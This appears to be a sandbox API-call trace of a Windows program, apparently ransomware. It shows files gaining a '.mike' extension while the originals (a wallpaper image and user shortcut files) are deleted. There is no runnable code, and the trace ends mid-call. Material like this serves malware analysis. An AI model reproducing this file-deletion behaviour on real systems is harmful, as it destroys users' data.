[0159.141] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.142] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.145] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.146] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.147] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.149] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.150] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.151] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.153] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.158] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.162] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.164] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.166] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.168] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.170] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.172] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.174] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.176] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.178] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.180] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.182] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.185] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.191] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.196] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.198] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.200] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.202] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.204] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.206] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.258] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg", dwFileAttributes=0x80) returned 1 [0159.258] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg")) returned 1 [0159.266] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.266] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.266] CoTaskMemFree (pv=0x508980) [0159.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.268] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.268] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.268] CoTaskMemFree (pv=0x508980) [0159.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.269] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.269] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.269] CoTaskMemFree (pv=0x508980) [0159.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.270] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.270] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.271] CoTaskMemFree (pv=0x508980) [0159.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.271] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.271] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.272] CoTaskMemFree (pv=0x508980) [0159.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.275] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.275] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.275] CoTaskMemFree (pv=0x508980) [0159.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.279] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.279] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.279] CoTaskMemFree (pv=0x508980) [0159.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.287] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.287] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.287] CoTaskMemFree (pv=0x508980) [0159.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.291] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.291] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.292] CoTaskMemFree (pv=0x508980) [0159.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.292] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.292] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.293] CoTaskMemFree (pv=0x508980) [0159.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.297] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.297] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.298] CoTaskMemFree (pv=0x508980) [0159.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.299] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.299] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.299] CoTaskMemFree (pv=0x508980) [0159.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.304] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.304] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.304] CoTaskMemFree (pv=0x508980) [0159.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.308] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.308] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.309] CoTaskMemFree (pv=0x508980) [0159.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.315] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.315] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.315] CoTaskMemFree (pv=0x508980) [0159.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.318] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0159.319] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x22 [0159.322] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Links\\Desktop.lnk", dwFileAttributes=0x80) returned 1 [0159.323] DeleteFileW (lpFileName="C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk")) returned 1 [0159.325] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0159.326] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x24 [0159.330] WriteFile (in: hFile=0x1c8, lpBuffer=0x2130c1c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2130c1c*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0159.330] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Links\\Downloads.lnk", dwFileAttributes=0x80) returned 1 [0159.331] DeleteFileW (lpFileName="C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk")) returned 1 [0159.333] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0159.334] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x27 [0159.337] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Links\\RecentPlaces.lnk", dwFileAttributes=0x80) returned 1 [0159.338] DeleteFileW (lpFileName="C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk")) returned 1 [0159.340] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.340] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.341] CoTaskMemFree (pv=0x508980) [0159.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.342] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.342] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.342] CoTaskMemFree (pv=0x508980) [0159.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.343] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.343] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.343] CoTaskMemFree (pv=0x508980) [0159.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.345] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.345] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.345] CoTaskMemFree (pv=0x508980) [0159.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.346] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.346] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.346] CoTaskMemFree (pv=0x508980) [0159.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.347] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.347] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.347] CoTaskMemFree (pv=0x508980) [0159.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.349] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.349] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.349] CoTaskMemFree (pv=0x508980) [0159.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.350] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.350] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.351] CoTaskMemFree (pv=0x508980) [0159.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.351] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.351] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.352] CoTaskMemFree (pv=0x508980) [0159.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.355] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.356] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.356] CoTaskMemFree (pv=0x508980) [0159.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.357] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.357] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.357] CoTaskMemFree (pv=0x508980) [0159.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.359] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.359] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.359] CoTaskMemFree (pv=0x508980) [0159.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.360] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.360] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.361] CoTaskMemFree (pv=0x508980) [0159.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.363] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.363] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.364] CoTaskMemFree (pv=0x508980) [0159.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.365] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.365] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.365] CoTaskMemFree (pv=0x508980) [0159.365] GetFullPathNameW 